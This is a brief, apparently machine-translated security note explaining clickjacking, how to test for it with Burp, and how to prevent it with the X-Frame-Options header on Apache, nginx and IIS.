1, the principle of vulnerability
Clickjacking is a visual deception. An attacker using a transparent, invisible iframe, overlaid on a page, and then persuade a user clicks on a transparent iframe page. By adjusting the position of the iframe page, you can entice users to just click on the function button iframe page.
2, vulnerability detection
Open Burp, a copy of attack code
Open a web page, F12 to enter developer mode, enter the console, paste attack code
burp loads the web page, click on "start".
3, suggested fix
- X-Frame-Options is the most reliable method, which has three values are: DENY, SAMEORIGIN, ALLOW-FROM origin
DENY: the browser will refuse to load any current page frame page
SAMEORIGIN: the frame page address for the page only in the homology domain
ALLOW-FROM origin: you can define a page address to allow frame loaded
- Apache: transmitting on all pages in response to X-Frame-Options header, need to add this line to the 'site' configuration: Header always append X-Frame-Options SAMEORIGIN
- nginx: Configure nginx transmitting X-Frame-Options header in response, to add the following line to the 'http', 'server' 'location' configuration or in: add_header X-Frame-Options SAMEORIGIN;
- IIS: Configure IIS transmitted X-Frame-Options response header, add the following to the Web.config configuration file:
1 <system.webServer> 2 <httpProtocol> 3 <customHeaders> 4 <add name="X-Frame-Options" value="SAMEORIGIN" /> 5 </customHeaders> 6 </httpProtocol> 7 </system.webServer>